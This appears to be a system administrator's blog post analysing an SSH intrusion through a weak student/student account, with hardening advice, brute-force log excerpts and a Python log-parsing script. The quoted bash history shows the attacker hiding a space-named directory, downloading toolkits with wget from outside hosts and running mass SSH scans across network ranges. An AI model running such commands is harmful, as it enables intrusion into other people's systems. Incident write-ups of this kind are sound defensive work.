The previous post was about tools for detecting hacking; a few days ago one of my hosts was compromised, and it had already been scanned with rkhunter. The cause was an account with the username/password pair student/student. The account was only used for transferring files over FTP, and although the guessed password gave the attacker a login with very few privileges, he used this host to attack other machines, and before long the computing center cut the IP off the network. I noticed because student's password had been changed, so I dug further, and as luck would have it he had not deleted .bash_history. Let's look at what he did:
w // first check which users are logged in
passwd // change the password; if he had left it alone, the intrusion would have been harder to notice
cd /var/tmp // change to /var/tmp, a directory every user can write to
mkdir " " // create a directory whose name is a single space; ls does not reveal it unless you notice the directory count
cd " "
wget serie.sapte.ro/as.tgz // download the attack tool
tar zxvf as.tgz // extract it
cd SSH/ // this should be where the tool lives
ls
./x 211.54; ./x 140.123 // from here on the attack tool runs, one network range at a time
./x 140.124; ./x 140.125; ./x 140.126 // all Taiwanese ranges, sadly
./x 140.127;./x 140.128;./x 140.129
exit // log out
cd /var/tmp/" " // logged in again
ls -a
cd SSH/
history
./x 140.109;./x 140.110;./x 140.111;./x 140.112;./x 140.113 // attacking again
./x 140.114
./x 140.115; ./x 140.116; ./x 140.117; ./x 140.118; ./x 140.119; ./x 140.120
./x 140.121; ./x 140.122; ./x 140.123; ./x 140.124; ./x 140.125
exit // log out
.
. // omitted
.
w // logged in again, this time switching to a different attack tool
cd /var/tmp
mkdir " "
cd " "
wget smeckeru.iitalia.com/delles.tar.gz
tar zxvf delles.tar.gz
rm -rf delles.tar.gz
cd delles
./a 211.54; ./a 211.20
./a 140.123; ./a 140.120; ./a 140.121; ./a 140.122; ./a 140.124; ./a 140.125; ./a 140.126; ./a 140.127; ./a 140.128; ./a 140.129; ./a 140.130
./a 129.93
./a 130.64
./a 140.131;./a 140.132;./a 140.133;./a 140.134;./a 140.135;./a 140.136;./a 140.137;./a 140.138;
exit
Check last:
# last | grep student

The IP found is 86.122.136.2
I went to www.DNSstuff.com (http://www.dnsstuff.com/) to look up where the IP comes from

The answer: Romania
I think some takeaways belong here, things to watch out for next time:
1. When creating a user account, it is not only the password that must be chosen carefully; the username itself should avoid common names that are easy to guess.
2. If an account is used only for FTP logins, edit /etc/passwd and set its shell to /sbin/nologin so it cannot log in interactively, which reduces the chance of intrusion.
3. SSH access is very powerful in the wrong hands, so restrict the address ranges allowed to connect where possible.
4. Good account and password control is a hundred times more important than patching packages.
5. This kind of attack is actually very simple and unsophisticated; it just happened to find an opening and got in. So beyond running rkhunter, anyone acting as a web master really has to get account control right first; that is the key.
Please check your own systems; the records below are all from 2011.
Oct 22 05:27:31 alpi3 sshd[37186]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 22 10:58:02 alpi3 sshd[37841]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 27 19:05:39 alpi3 sshd[18706]: error: PAM: User not known to the underlying authentication module for illegal user nancy from smallken.no-ip.org
Oct 27 22:26:41 alpi3 sshd[19071]: error: PAM: User not known to the underlying authentication module for illegal user recepcao from smallken.no-ip.org
Oct 28 10:45:45 alpi3 sshd[21385]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 28 17:17:17 alpi3 sshd[23676]: error: PAM: User not known to the underlying authentication module for illegal user shawn from smallken.no-ip.org
Oct 29 01:50:58 alpi3 sshd[26237]: error: PAM: User not known to the underlying authentication module for illegal user sftpuser from smallken.no-ip.org
Oct 29 11:16:49 alpi3 sshd[27920]: error: PAM: User not known to the underlying authentication module for illegal user wsmith from smallken.no-ip.org
Nov 18 15:14:12 alpi3 sshd[11225]: error: PAM: User not known to the underlying authentication module for illegal user Abel from smallken.no-ip.org
Nov 18 23:56:33 alpi3 sshd[13499]: error: PAM: User not known to the underlying authentication module for illegal user armine from smallken.no-ip.org
Nov 19 07:34:25 alpi3 sshd[21874]: error: PAM: User not known to the underlying authentication module for illegal user brown from smallken.no-ip.org
Nov 19 10:09:04 alpi3 sshd[22159]: error: PAM: User not known to the underlying authentication module for illegal user capp from smallken.no-ip.org
Nov 19 16:58:45 alpi3 sshd[23533]: error: PAM: User not known to the underlying authentication module for illegal user colette from smallken.no-ip.org
Nov 20 01:08:50 alpi3 sshd[24980]: error: PAM: User not known to the underlying authentication module for illegal user dexter from smallken.no-ip.org
Nov 20 02:35:27 alpi3 sshd[25148]: error: PAM: User not known to the underlying authentication module for illegal user domain from smallken.no-ip.org
Nov 20 02:55:50 alpi3 sshd[25181]: error: PAM: User not known to the underlying authentication module for illegal user donny from smallken.no-ip.org
Dec 2 01:36:24 alps5 sshd[18819]: error: PAM: Authentication failure for root from smallken.no-ip.org
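As an added illustration (not part of the original post), here is a small Python script that parses sshd/PAM lines in exactly the format shown above and flags source hosts that rack up failures across several usernames, which is the signature of the dictionary scanning these records show. The sample lines embedded in it are constructed for the demonstration, and the hostname example.invalid is a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample lines in the same sshd/PAM format as the excerpt above.
SAMPLE_LOG = """\
Oct 22 05:27:31 alpi3 sshd[37186]: error: PAM: Authentication failure for root from smallken.no-ip.org
Oct 27 19:05:39 alpi3 sshd[18706]: error: PAM: User not known to the underlying authentication module for illegal user nancy from smallken.no-ip.org
Oct 27 22:26:41 alpi3 sshd[19071]: error: PAM: User not known to the underlying authentication module for illegal user recepcao from smallken.no-ip.org
Oct 28 10:45:45 alpi3 sshd[21385]: error: PAM: Authentication failure for root from smallken.no-ip.org
Nov 18 15:14:12 alpi3 sshd[11225]: error: PAM: User not known to the underlying authentication module for illegal user Abel from smallken.no-ip.org
Nov 19 07:34:25 alpi3 sshd[21874]: error: PAM: User not known to the underlying authentication module for illegal user brown from example.invalid
"""

# Two failure shapes appear in the log: a wrong password for an existing user,
# and an attempt against a username that does not exist on the host at all.
AUTH_FAIL = re.compile(r"sshd\[\d+\]: error: PAM: Authentication failure for (?P<user>\S+) from (?P<src>\S+)")
ILLEGAL_USER = re.compile(r"sshd\[\d+\]: error: PAM: User not known to the underlying authentication module "
                          r"for illegal user (?P<user>\S+) from (?P<src>\S+)")

def parse_line(line):
    """Return (source, user, kind) for a failed-login line, or None for anything else."""
    m = ILLEGAL_USER.search(line)
    if m:
        return m.group("src"), m.group("user"), "illegal_user"
    m = AUTH_FAIL.search(line)
    if m:
        return m.group("src"), m.group("user"), "auth_failure"
    return None

def summarize(log_text):
    """Per source host: total failures, distinct usernames tried, and how many were non-existent users."""
    stats = defaultdict(lambda: {"failures": 0, "users": set(), "illegal_users": 0})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, user, kind = parsed
        entry = stats[src]
        entry["failures"] += 1
        entry["users"].add(user)
        if kind == "illegal_user":
            entry["illegal_users"] += 1
    return dict(stats)

def suspicious_sources(stats, min_failures=3, min_distinct_users=2):
    """Hosts that look like a dictionary scan: many failures spread over several usernames."""
    return sorted(src for src, e in stats.items()
                  if e["failures"] >= min_failures and len(e["users"]) >= min_distinct_users)

if __name__ == "__main__":
    stats = summarize(SAMPLE_LOG)
    for src in suspicious_sources(stats):
        e = stats[src]
        print(f"{src}: {e['failures']} failures, usernames tried: {sorted(e['users'])}")
```

Point it at your real auth log (for example by reading /var/log/auth.log or /var/log/secure into summarize) and the sources it lists are the ones worth blocking at the firewall or in hosts.deny.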